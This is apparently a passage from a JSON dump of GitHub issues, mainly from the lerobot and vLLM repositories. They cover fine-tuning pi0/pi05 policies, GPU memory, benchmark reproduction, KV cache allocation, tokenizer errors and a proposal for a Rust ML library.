Solution: Hybrid Architecture\nInstead of choosing one direction, we propose a dual-track approach:\n- **flicker-core**: Lightweight inference (current focus) \n- **flicker-train**: Advanced training features\n- **Feature Gates**: Granular control for specific capabilities\n\n## Key Strategic Questions\n\n### 1. Technical Feasibility\n- Is zero-copy gradient system feasible with Rust ownership?\n- How do we implement compile-time training validation?\n- What's the best approach for async-distributed training?\n\n### 2. Market Positioning \n- Does hybrid approach make sense for flicker's goals?\n- How do we balance inference vs training development resources?\n- Will this attract both inference and training users?\n\n### 3. Implementation Priority\n- Which advanced training features should we implement first?\n- How do we ensure seamless transition from inference to training?\n- What performance targets should we set vs PyTorch?\n\n## Revolutionary Differentiators\nThe proposal identifies 4 major areas where Rust could revolutionize ML:\n1. **Zero-Copy Gradient Systems** - Gradients as views, not copies\n2. **Compile-Time Training Validation** - Catch training errors at compile time \n3. **Async-First Training Infrastructure** - True concurrency without GIL\n4. **SIMD-Optimized Research Features** - Hand-optimized kernels impossible in Python\n\n## Benefits\n\u2705 Preserves current lightweight inference advantages\n\u2705 Enables advanced training capabilities unique to Rust \n\u2705 Creates natural upgrade path for users\n\u2705 Positions flicker as both practical tool and research platform\n\n## Next Steps\n1. **Enable GitHub Discussions** to facilitate community input\n2. **Review detailed proposal** in `STRATEGIC_DISCUSSION_PROPOSAL.md`\n3. **Gather feedback** from community on strategic direction\n4. **Validate technical feasibility** of proposed features\n5. **Create implementation roadmap** based on consensus\n\n## Discussion Document\n\ud83d\udccb **Full Proposal**: See `STRATEGIC_DISCUSSION_PROPOSAL.md` for comprehensive analysis including:\n- Current state analysis\n- PyTorch comparison\n- Technical implementation details\n- Code examples of revolutionary features\n- Trade-offs and considerations\n- Community input questions\n\n## Call for Input\nThis represents a potential major evolution for flicker. Community input is essential to validate:\n- Strategic direction alignment with user needs\n- Technical feasibility of proposed features \n- Implementation priority and resource allocation\n- Market positioning effectiveness\n\n**Please review the detailed proposal and share your thoughts on flicker's strategic future.**\n\n---\n*This issue will be converted to a GitHub Discussion once discussions are enabled on the repository.*", "url": "https://github.com/huggingface/candle/issues/3137", "state": "closed", "labels": [], "created_at": "2025-10-18T17:27:24Z", "updated_at": "2025-10-21T16:18:51Z", "comments": 1, "user": "jagan-nuvai" }, { "repo": "huggingface/lerobot", "number": 2245, "title": "release 0.4.0 and torch 2.8.0", "body": "Hello Lerobot Team! :) \nQuick question, do you have a time estimate for:\n\n- lerobot release 0.4.0 (ie next stable release using the new v30 data format)\n- bumping torch to 2.8 \n\nThanks a lot in advance!\n", "url": "https://github.com/huggingface/lerobot/issues/2245", "state": "closed", "labels": [ "question", "dependencies" ], "created_at": "2025-10-18T16:57:07Z", "updated_at": "2025-10-19T18:34:47Z", "user": "antoinedandi" }, { "repo": "huggingface/lerobot", "number": 2242, "title": "Is it no longer possible to fine-tune the previously used \u03c00 model?", "body": "I previously trained a model using the following command for fine-tuning:\n\n`lerobot-train --dataset.repo_id=parkgyuhyeon/slice-clay --policy.path=lerobot/pi0 --output_dir=outputs/train/pi0_slice-clay --job_name=pi0_slice-clay --policy.device=cuda --wandb.enable=false --wandb.project=lerobot --log_freq=10 --steps=50000 --policy.repo_id=parkgyuhyeon/pi0_slice-clay --policy.push_to_hub=false`\n\n\nHowever, after the release of \u03c00.5, I noticed that the new example command includes additional arguments like:\n\n```\n--policy.repo_id=your_repo_id \\\n--policy.compile_model=true \\\n--policy.gradient_checkpointing=true \\\n--policy.dtype=bfloat16 \\\n```\n\n\nIt seems that some new options have been added.\nDoes this mean the model I fine-tuned earlier using \u03c00 can no longer be used?", "url": "https://github.com/huggingface/lerobot/issues/2242", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-10-18T08:42:35Z", "updated_at": "2025-10-20T00:18:03Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/lerobot", "number": 2239, "title": "Models trained using openpi pi0.5 on Lerobot's pi0.5", "body": "Hi, can I check if models trained using the [pytorch port of openpi's pi0.5](https://github.com/Physical-Intelligence/openpi?tab=readme-ov-file#pytorch-support) are compatible with lerobot's defination of pi0.5?\n\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/2239", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-18T02:01:45Z", "updated_at": "2025-10-18T10:54:06Z", "user": "brycegoh" }, { "repo": "huggingface/lerobot", "number": 2228, "title": "Trossen WidowX AI model, depth cameras and tests", "body": "Hi,\n\nWould you be open to receive pull requests to support more recent trossen robotics setups as well as depth cameras? I think for the robot part the pattern is quite well established. For depth cameras we solved it by tweaking a bit the dataset utils.\n\nOur implementation is fairly tested.", "url": "https://github.com/huggingface/lerobot/issues/2228", "state": "closed", "labels": [ "question", "robots" ], "created_at": "2025-10-17T09:32:22Z", "updated_at": "2025-10-31T19:15:25Z", "user": "lromor" }, { "repo": "vllm-project/vllm", "number": 27090, "title": "[Usage]: Does vLLM support a data-parallel group spanning multiple nodes when starting an online service?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nDoes vLLM support a data-parallel group spanning multiple nodes when starting an online service?\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27090", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-17T09:15:04Z", "updated_at": "2025-10-20T02:37:19Z", "comments": 2, "user": "KrisLu999" }, { "repo": "vllm-project/vllm", "number": 27086, "title": "[Bug]: After enabling P-D Disaggregation, the final output results are not entirely identical.", "body": "### Your current environment\n\nvllm VERSION\uff1a 0.10.1\n\n### \ud83d\udc1b Describe the bug\n\nWhen I fixed the random seed and ensured all environment variables were consistent, I noticed that launching PD separation with the same configuration produced inconsistent final outputs. This phenomenon may require multiple attempts to fully manifest. I have a question: Is this behavior normal? (under temperature=0 conditions)\n\nvllm startup script \uff08D\uff09\uff0cThe startup process for P nodes is almost identical, except for the use of \u201ckv_producer\u201d.\n```\nVLLM_CFG=(\n --trust-remote-code\n --data-parallel-size 1\n --tensor-parallel-size 8\n --no-enable-prefix-caching\n --no-enable-chunked-prefill\n --kv-transfer-config '{\"kv_connector\":\"NixlConnector\",\"kv_role\":\"kv_consumer\"}'\n)\n```\n\nWhen requested, temperature=0\n```\ncurl -X POST -s http://${HOST_PORT}/v1/completions \\\n-H \"Content-Type: application/json\" \\\n-d '{\n \"model\": \"base_model\",\n \"prompt\": \"xxxx\", # The prompt is identical for every request, and this prompt will also appear.\n \"max_tokens\": 1000,\n \"temperature\": 0,\n \"stream\": true\n}'\nprintf \"\\n\"\n```\n\nMy question is: Does the PD also have a probability of producing non-identical outputs at every step when temperature=0? If this is a normal phenomenon, what causes it? If this is a bug, what might be causing it?\n\nLooking forward to your responses. Thank you.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27086", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-17T07:56:41Z", "updated_at": "2025-10-20T09:16:21Z", "comments": 4, "user": "freedom-cui" }, { "repo": "huggingface/lerobot", "number": 2227, "title": "How to easily run inference with a trained model", "body": "Hello, and thank you for sharing such an inspiring project!\n\nI\u2019m currently working with a 7-DoF robotic arm (6 joint axes + 1 gripper) and generating datasets through video recordings for training on smolVLA. Since there\u2019s still some ongoing engineering work related to dataset generation, I\u2019d like to start by understanding how the inference pipeline is implemented.\n\nI have successfully verified the training workflow using the [lerobot/svla_so100_pickplace](https://huggingface.co/datasets/lerobot/svla_so100_pickplace) dataset and produced a trained model. Now, I\u2019m wondering if there is a way to quickly load the trained model and perform inference, similar to how OpenVLA provides a simple demo on Hugging Face \u2014 where the model can be loaded and tested with just a few lines of code.\n\nFor OpenVLA example:\n```\nfrom transformers import AutoModelForVision2Seq, AutoProcessor\nfrom PIL import Image\nimport torch\n\n# Load Processor & VLA\nprocessor = AutoProcessor.from_pretrained(\"openvla/openvla-7b\", trust_remote_code=True)\nvla = AutoModelForVision2Seq.from_pretrained(\n \"openvla/openvla-7b\", \n attn_implementation=\"flash_attention_2\", # [Optional] Requires `flash_attn`\n torch_dtype=torch.bfloat16, \n low_cpu_mem_usage=True, \n trust_remote_code=True\n).to(\"cuda:0\")\n\n# Grab image input & format prompt\nimage: Image.Image = get_from_camera(...)\nprompt = \"In: What action should the robot take to {}?\\nOut:\"\n\n# Predict Action (7-DoF; un-normalize for BridgeData V2)\ninputs = processor(prompt, image).to(\"cuda:0\", dtype=torch.bfloat16)\naction = vla.predict_action(**inputs, unnorm_key=\"bridge_orig\", do_sample=False)\n\n# Execute...\nrobot.act(action, ...)\n```\nI would be very grateful if you could share any related information or references.", "url": "https://github.com/huggingface/lerobot/issues/2227", "state": "open", "labels": [ "question" ], "created_at": "2025-10-17T05:41:15Z", "updated_at": "2025-12-16T02:57:00Z", "user": "Biz-Joe" }, { "repo": "huggingface/lerobot", "number": 2224, "title": "Can i just modify the json the pretrained policy to adapt it to my own robot?", "body": "I just want to know if i can just modify the config json(shape of state, size of image .etc) to adapt the model to inference in my modified robot(have different number of feetect and different image resolution)?", "url": "https://github.com/huggingface/lerobot/issues/2224", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-17T01:33:32Z", "updated_at": "2025-10-20T16:40:26Z", "user": "shs822" }, { "repo": "huggingface/lerobot", "number": 2221, "title": "Question about pre-trained weights usability and performance on Hugging Face models", "body": "Hello,\n\nI would like to ask whether the weights provided on Hugging Face (for example, under the lerobot author page) can be directly downloaded and used for inference, or if they must be fine-tuned before achieving reasonable performance.\n\nWhen I directly load and evaluate the models (e.g., lerobot/smolvla_base or lerobot/pi05_libero_base), the performance appears extremely poor, almost random. I\u2019m wondering if this is expected behavior or if I might have made a mistake in my setup.\n\nHere\u2019s the list of models I found on Hugging Face:\n\nlerobot/smolvla_base\nlerobot/pi05_base\nlerobot/diffusion_pusht\nlerobot/pi0_base\nlerobot/pi05_libero_base\nlerobot/act_aloha_sim_transfer_cube_human\nlerobot/vqbet_pusht\nlerobot/diffusion_pusht_keypoints\nlerobot/act_aloha_sim_insertion_human\nlerobot/pi0_libero_base\nlerobot/pi05_libero_finetuned\nlerobot/pi05_libero_finetuned_quantiles\nlerobot/pi0_libero_finetuned\n\n\nAre the *_base models supposed to be general pre-trained checkpoints that require downstream fine-tuning (e.g., on LIBERO), while the *_finetuned ones are ready for evaluation?\n\nThank you in advance for your clarification!", "url": "https://github.com/huggingface/lerobot/issues/2221", "state": "closed", "labels": [ "question" ], "created_at": "2025-10-16T14:14:39Z", "updated_at": "2025-10-31T16:26:45Z", "user": "MichaelWu99-lab" }, { "repo": "vllm-project/vllm", "number": 27021, "title": "[Usage]: Need guidance reproducing benchmark results from PR #25337 \u2014 results differ significantly from reported data", "body": "## Background\nRecently, we have been working on optimizing the position computation for multimodal models in vLLM.\n\nDuring benchmarking, we noticed that our results were not as expected.\n\nTo investigate, we decided to reproduce the benchmark results from [PR #25337](https://github.com/vllm-project/vllm/pull/25337), comparing the performance before and after that PR was merged into the main branch.\n\n- Before PR commit: cf56cf78b47e5f9b6a81ce0d50a94f9291922315\n\n- After PR commit: 30d08911f7cf78287f8da003ddcc99f6ef196f9f\n \n \"Image\"\n\nHowever, our reproduced results differ **significantly** from the performance data reported in the PR.\n\nWe\u2019d like to understand whether this discrepancy may be caused by hardware differences, model choice, or benchmark setup.\n\n**Who can help guide me?**\n\n## Model and Environment\n- Model used: Qwen/Qwen3-VL-30B-A3B-Instruct-FP8(The modelQwen3-VL-4B used in the PR could not be found on Hugging Face.)\n\n- GPU: NVIDIA A100 PCIe\n\n- vLLM startup command:\n```bash\nvllm serve \"Qwen/Qwen3-VL-30B-A3B-Instruct-FP8\" \\\n --trust-remote-code \\\n --gpu-memory-utilization 0.9 \\\n --max-model-len 16384\n```\n\n## Benchmark Command\n```bash\nvllm bench serve \\\n --backend openai-chat \\\n --model \"Qwen/Qwen3-VL-30B-A3B-Instruct-FP8\" \\\n --base-url \"http://localhost:8000\" \\\n --endpoint \"/v1/chat/completions\" \\\n --dataset-name \"hf\" \\\n --dataset-path \"lmarena-ai/VisionArena-Chat\" \\\n --num-prompts 100 \\\n --request-rate 10 \\\n --save-result \\\n --result-dir benchmarks_results \\\n --result-filename test.json\n```\n\n## Our Benchmark Results\n### Before PR #25337\n```text\n============ Serving Benchmark Result ============\nSuccessful requests: 100\nRequest rate configured (RPS): 10.00\nBenchmark duration (s): 16.91\nTotal input tokens: 5280\nTotal generated tokens: 11522\nRequest throughput (req/s): 5.91\nOutput token throughput (tok/s): 681.42\nPeak output token throughput (tok/s): 2225.00\nPeak concurrent requests: 97.00\nTotal Token throughput (tok/s): 993.68\n---------------Time to First Token----------------\nMean TTFT (ms): 1176.13\nMedian TTFT (ms): 1185.79\nP99 TTFT (ms): 2178.91\n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): 88.39\nMedian TPOT (ms): 78.68\nP99 TPOT (ms): 392.01\n---------------Inter-token Latency----------------\nMean ITL (ms): 77.30\nMedian ITL (ms): 42.31\nP99 ITL (ms): 581.15\n==================================================\n```\n\n### After PR #25337\n```text\n============ Serving Benchmark Result ============\nSuccessful requests: 100\nRequest rate configured (RPS): 10.00\nBenchmark duration (s): 16.89\nTotal input tokens: 5280\nTotal generated tokens: 11640\nRequest throughput (req/s): 5.92\nOutput token throughput (tok/s): 689.02\nPeak output token throughput (tok/s): 2178.00\nPeak concurrent requests: 97.00\nTotal Token throughput (tok/s): 1001.57\n---------------Time to First Token----------------\nMean TTFT (ms): 1193.52\nMedian TTFT (ms): 1285.23\nP99 TTFT (ms): 2111.41\n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): 88.84\nMedian TPOT (ms): 78.00\nP99 TPOT (ms): 344.25\n---------------Inter-token Latency----------------\nMean ITL (ms): 76.89\nMedian ITL (ms): 42.30\nP99 ITL (ms): 597.42\n==================================================\n```\n\n## Reference: Benchmark Results from PR #25337\n### Main branch\n```text\n============ Serving Benchmark Result ============\nSuccessful requests: 1000 \nRequest rate configured (RPS): 10.00 \nBenchmark duration (s): 101.85 \nTotal input tokens: 94327 \nTotal generated tokens: 120882 \nRequest throughput (req/s): 9.82 \nOutput token throughput (tok/s): 1186.81 \nPeak output token throughput (tok/s): 2862.00 \nPeak concurrent requests: 133.00 \nTotal Token throughput (tok/s): 2112.91 \n---------------Time to First Token----------------\nMean TTFT (ms): 229.53 \nMedian TTFT (ms): 180.19 \nP99 TTFT (ms): 928.83 \n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): ", "url": "https://github.com/vllm-project/vllm/issues/27021", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-16T12:31:03Z", "updated_at": "2025-10-17T05:46:32Z", "comments": 5, "user": "deitxfge" }, { "repo": "vllm-project/vllm", "number": 27017, "title": "[Doc]: KV Cache Memory allocations", "body": "### \ud83d\udcda The doc issue\n\nHello,\nWhen serving a model via vLLM for text(token) generation:\n\n1. Before a new request gets scheduled, does vLLM check if KV cache for a sequence length of `max_model_len` is available for that new request or does it check if KV cache for a sequence length of `input prompt + max_tokens` (if it's less than _max_model_length_) is available for the request? In case the request does not specify a _max_tokens_ does it default to 16?\n2. In case the required KV cache memory is not available, does the server wait until it is available to schedule that new request?\n3. When exactly is the KV cache allocated for a particular request? Do the KV cache blocks get allocated after computing the number of new blocks required for all current requests after each generation step of the model, as mentioned in this [blog post](https://www.aleksagordic.com/blog/vllm)? i.e. the KV cache block is not fully allocated upfront based on the point [1] calculation instead incrementally allocated since the request could finish before it reaches the _max_tokens_ or _max_model_length_ limit?\n\n4. I am trying to understand if the server concurrency can be more than the one specified in the server startup logs (based on the _max_model_len_) and get a clearer understanding of request scheduling.\nexample logs:\n ```\n GPU KV cache size: {X} tokens\n Maximum concurrency for {max_model_len} tokens per request: Y\n ```\n5. The KV cache token and concurrency estimations vLLM gives in the start up logs for the **_Qwen-235B MoE_** model do not match the below formula for `tensor_parallel_size` of 8. It does match for `tensor_parallel_size` of 4 and in general for a different model like **_Llama-70B_**. Is the below formula missing something specifically for the Qwen-235B models at `tensor_parallel_size` of 8?\n```\nnumber of layers * number of KV heads * head dimension * precision/8 * 2 (for K & V) * seq_len bytes\n\nOR \n\n(number of layers * number of KV heads * head dimension * precision/8 * 2 (for K & V) * seq_len)/tensor_parallel_size bytes per GPU\n\ni.e. for Qwen-235B MoE\n(94 * 4 * 128 * 16/8 * 2 * seq_len)/8 bytes per GPU\n```\n\nThanks!\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27017", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-10-16T11:43:43Z", "updated_at": "2025-11-04T11:08:02Z", "comments": 7, "user": "sneha5gsm" }, { "repo": "vllm-project/vllm", "number": 27011, "title": "[Usage]: Runnig GLM4.5-Air with Speculative Decoding", "body": "### Your current environment\n```\nThe output of `python collect_env.py`\n```\n### How would you like to use vllm\nI want to run inference of a [GLM-4.5-Air](https://huggingface.co/zai-org/GLM-4.5-Air-FP8) with speculative decoding. From [GLM 4.5](https://huggingface.co/zai-org/GLM-4.5) page, it mentioned `All models use MTP layers and specify --speculative-num-steps 3 --speculative-eagle-topk 1 --speculative-num-draft-tokens 4 to ensure competitive inference speed.`\nThey gave examples of how to use speculative decoding in sglang, but not in vLLM. I was wondering if it is being supported in vLLM\n### Before submitting a new issue...\n- [x]Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27011", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-16T10:17:54Z", "updated_at": "2025-10-16T10:23:01Z", "comments": 0, "user": "aqx95" }, { "repo": "vllm-project/vllm", "number": 27006, "title": "[Usage]: In vLLM version 0.8.5, when I send an HTTP image URL directly, the model cannot recognize the image content, but it works correctly when I use a base64-encoded image. I\u2019d like to understand why this happens.", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27006", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-16T08:09:29Z", "updated_at": "2025-10-16T10:33:49Z", "comments": 4, "user": "Lislttt" }, { "repo": "huggingface/lerobot", "number": 2218, "title": "image pad value in pi0/pi05", "body": "### System Info\n\n```Shell\nthe latest lerobot version\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\ndef resize_with_pad_torch( # see openpi `resize_with_pad_torch` (exact copy)\n images: torch.Tensor,\n height: int,\n width: int,\n mode: str = \"bilinear\",\n) -> torch.Tensor:\n \"\"\"PyTorch version of resize_with_pad. Resizes an image to a target height and width without distortion\n by padding with black. If the image is float32, it must be in the range [-1, 1].\n\n Args:\n images: Tensor of shape [*b, h, w, c] or [*b, c, h, w]\n height: Target height\n width: Target width\n mode: Interpolation mode ('bilinear', 'nearest', etc.)\n\n Returns:\n Resized and padded tensor with same shape format as input\n \"\"\"\n # Check if input is in channels-last format [*b, h, w, c] or channels-first [*b, c, h, w]\n if images.shape[-1] <= 4: # Assume channels-last format\n channels_last = True\n if images.dim() == 3:\n images = images.unsqueeze(0) # Add batch dimension\n images = images.permute(0, 3, 1, 2) # [b, h, w, c] -> [b, c, h, w]\n else:\n channels_last = False\n if images.dim() == 3:\n images = images.unsqueeze(0) # Add batch dimension\n\n batch_size, channels, cur_height, cur_width = images.shape\n\n # Calculate resize ratio\n ratio = max(cur_width / width, cur_height / height)\n resized_height = int(cur_height / ratio)\n resized_width = int(cur_width / ratio)\n\n # Resize\n resized_images = F.interpolate(\n images,\n size=(resized_height, resized_width),\n mode=mode,\n align_corners=False if mode == \"bilinear\" else None,\n )\n\n # Handle dtype-specific clipping\n if images.dtype == torch.uint8:\n resized_images = torch.round(resized_images).clamp(0, 255).to(torch.uint8)\n elif images.dtype == torch.float32:\n resized_images = resized_images.clamp(-1.0, 1.0)\n else:\n raise ValueError(f\"Unsupported image dtype: {images.dtype}\")\n\n # Calculate padding\n pad_h0, remainder_h = divmod(height - resized_height, 2)\n pad_h1 = pad_h0 + remainder_h\n pad_w0, remainder_w = divmod(width - resized_width, 2)\n pad_w1 = pad_w0 + remainder_w\n\n # Pad\n constant_value = 0 if images.dtype == torch.uint8 else -1.0\n padded_images = F.pad(\n resized_images,\n (pad_w0, pad_w1, pad_h0, pad_h1), # left, right, top, bottom\n mode=\"constant\",\n value=constant_value,\n )\n\n # Convert back to original format if needed\n if channels_last:\n padded_images = padded_images.permute(0, 2, 3, 1) # [b, c, h, w] -> [b, h, w, c]\n\n return padded_images\n\n\n\n### Expected behavior\n\n image from lerobot range from 0 to 1 and dtype is float32 , so constant_value in this code is -1 not 0. -1*2-1=-3, so that there are '-3' in the input of siglip embedding ", "url": "https://github.com/huggingface/lerobot/issues/2218", "state": "open", "labels": [ "bug", "question", "policies" ], "created_at": "2025-10-16T06:48:13Z", "updated_at": "2025-10-17T09:58:49Z", "user": "Tgzz666" }, { "repo": "huggingface/transformers", "number": 41640, "title": "AttributeError: BartTokenizerFast has no attribute image_token. Did you mean: 'mask_token'?", "body": "### System Info\n\nUbuntu\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nimport torch\nimport requests\nfrom PIL import Image\nfrom transformers import AutoProcessor, Florence2ForConditionalGeneration\n\n\nmodel = Florence2ForConditionalGeneration.from_pretrained(\n \"microsoft/Florence-2-large\",\n dtype=torch.bfloat16,\n)\nprocessor = AutoProcessor.from_pretrained(\"microsoft/Florence-2-large\")\n\nurl = \"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/transformers/tasks/car.jpg?download=true\"\nimage = Image.open(requests.get(url, stream=True).raw).convert(\"RGB\")\n\ntask_prompt = \"\"\ninputs = processor(text=task_prompt, images=image, return_tensors=\"pt\").to(model.device, torch.bfloat16)\n\ngenerated_ids = model.generate(\n **inputs,\n max_new_tokens=1024,\n num_beams=3,\n)\ngenerated_text = processor.batch_decode(generated_ids, skip_special_tokens=False)[0]\n\nimage_size = image.size\nparsed_answer = processor.post_process_generation(generated_text, task=task_prompt, image_size=image_size)\n\nprint(parsed_answer)\n```\n\n### Expected behavior\n\n```\n raise AttributeError(f\"{self.__class__.__name__} has no attribute {key}\")\nAttributeError: BartTokenizerFast has no attribute image_token. Did you mean: 'mask_token'?\n```", "url": "https://github.com/huggingface/transformers/issues/41640", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-16T06:34:02Z", "updated_at": "2025-10-17T09:00:36Z", "comments": 5, "user": "conceptofmind" }, { "repo": "huggingface/transformers.js", "number": 1439, "title": "Integration to a CLI application created using PKG", "body": "### Question\n\nI'm trying to bundle a Node.js CLI tool that uses `@xenova/transformers` into a single executable using [pkg](https://github.com/vercel/pkg).\n\nThe build works fine, but when I run the packaged executable, I get this error:\n```\nError: Cannot find module '../bin/napi-v3/linux/x64/onnxruntime_binding.node'\nRequire stack:\n- /snapshot/custom-cli/node_modules/onnxruntime-node/dist/binding.js\n- /snapshot/custom-cli/node_modules/onnxruntime-node/dist/backend.js\n- /snapshot/custom-cli/node_modules/onnxruntime-node/dist/index.js\n- /snapshot/custom-cli/dist/custom-cli.cjs\n```\n\n**Build command:**\n\n`webpack && pkg -t node18-linux -o custom-cli dist/custom-cli.cjs`\n\n**pkg config:**\n\n```\n\"pkg\": {\n \"assets\": [\n \"node_modules/onnxruntime-node/bin/napi-v3/**/onnxruntime_binding.node\"\n ]\n}\n```\n\n\n**Is it possible to give a custom absolute path for ONNX native bindings (something like this):** \n```\nimport { env } from \"@xenova/transformers\";\nenv.backends.onnx.customBindingPath = \"/custom-cli/onnxruntime_binding.node\";\n```\n\nthen the tool could:\n- Extract prebuilt binaries (onnxruntime_binding.node) from a known location (or GitHub ZIP)\n\n- Pass that custom path to @xenova/transformers / onnxruntime-node\n\n- Load correctly even when packaged by pkg\n", "url": "https://github.com/huggingface/transformers.js/issues/1439", "state": "open", "labels": [ "question" ], "created_at": "2025-10-16T05:30:32Z", "updated_at": "2025-10-26T23:32:41Z", "user": "JosephJibi" }, { "repo": "huggingface/lerobot", "number": 2216, "title": "gpu memory required to finetune pi05", "body": "I tried to finetune pi05 with rxt a6000 (48GB) and get an insufficient memory error . Does anyone know how much GPU memory is needed to finetune a pi05 policy?\n\nThanks,", "url": "https://github.com/huggingface/lerobot/issues/2216", "state": "open", "labels": [ "question", "policies", "performance" ], "created_at": "2025-10-16T04:46:21Z", "updated_at": "2025-12-22T07:42:45Z", "user": "jcl2023" }, { "repo": "vllm-project/vllm", "number": 26981, "title": "[Usage]: Does vllm support use TokensPrompt for Qwen3VL model", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nMy truncation strategy differs slightly from the standard approach (I wish to preserve the system prompt and the final suffix, only truncating the middle portion). It seems that the current version of vLLM does not support this, so I attempted to pass pre-processed token IDs along with mm_data as input, for example: TokensPrompt(prompt_token_ids=text[:self.max_model_length] + self.suffix_tokens, multi_modal_data=mm_data, mm_processor_kwargs=video_kwargs). \nHowever, I encountered an error. Could you please advise on the correct way to use this?\n\n\"Image\"\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26981", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-16T03:22:09Z", "updated_at": "2025-10-27T03:33:53Z", "comments": 10, "user": "afalf" }, { "repo": "huggingface/lerobot", "number": 2214, "title": "Potential Scale Imbalance in smolVLA Embedding Pipeline", "body": "Hi, I noticed a potential scale inconsistency in the embedding pipeline.\n\nSpecifically, state_emb is not normalized, while both img_emb and lang_emb are explicitly scaled by math.sqrt(emb_dim):\nhttps://github.com/huggingface/lerobot/blob/a6ff3cfebb0304f2c378515dd30ea06fff8f473f/src/lerobot/policies/smolvla/modeling_smolvla.py#L591-L601\n\nIn practice, the numerical magnitude of img_emb tends to be much higher (often in the hundreds), while lang_emb and state_emb remain in the single-digit range. This discrepancy might cause the image features to dominate during multimodal fusion or attention.\n\nRelated code:\nhttps://github.com/huggingface/lerobot/blob/a6ff3cfebb0304f2c378515dd30ea06fff8f473f/src/lerobot/policies/smolvla/modeling_smolvla.py#L561-L566\n\nSuggestion:\nConsider adding a LayerNorm after img_emb (or before the multimodal fusion stage) to align the scale across modalities. This could improve stability during training and quantization.\n\n\u2014\nReported by Tank @ iMotion AI", "url": "https://github.com/huggingface/lerobot/issues/2214", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-16T02:11:24Z", "updated_at": "2025-10-17T11:29:36Z", "user": "kkTkk012" }, { "repo": "vllm-project/vllm", "number": 26964, "title": "[Bug]: Issue with Deepseek Reasoning parser with Qwen3 2507 chat templates", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\n# wget https://raw.githubusercontent.com/vllm-project/vllm/main/vllm/collect_env.py\n# For security purposes, please feel free to check the contents of collect_env.py before running it.\npython collect_env.py\n--2025-10-15 17:33:01-- https://raw.githubusercontent.com/vllm-project/vllm/main/vllm/collect_env.py\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 28050 (27K) [text/plain]\nSaving to: \u2018collect_env.py.2\u2019\n\ncollect_env.py.2 100%[===================================>] 27.39K --.-KB/s in 0s \n\n2025-10-15 17:33:01 (65.0 MB/s) - \u2018collect_env.py.2\u2019 saved [28050/28050]\n\n# # sh: 8: python: not found\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nI'm running vLLM as a docker container on an Unraid server. It is a backend to Open WebUI chat interface. The issue I see is that the reasoning block for Open WebUI is closing too early. According to this discussion on the Open WebUI git, I think it is because of the deepseek parser used as recommended by the model card. See this link: https://github.com/open-webui/open-webui/pull/16687\n\nHere is an example of the issue that I face: \n\n\"Image\"\n\nI think this is the place to raise this issue. Thanks so much!\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26964", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-16T00:39:12Z", "updated_at": "2025-10-20T17:47:02Z", "comments": 1, "user": "MikeNatC" }, { "repo": "vllm-project/vllm", "number": 26949, "title": "[Bug]: RuntimeError: CUDA driver error: invalid device ordinal when symmetric memory (symm_mem) is enabled in multi-GPU vLLM setup with 4H100 PCIe", "body": 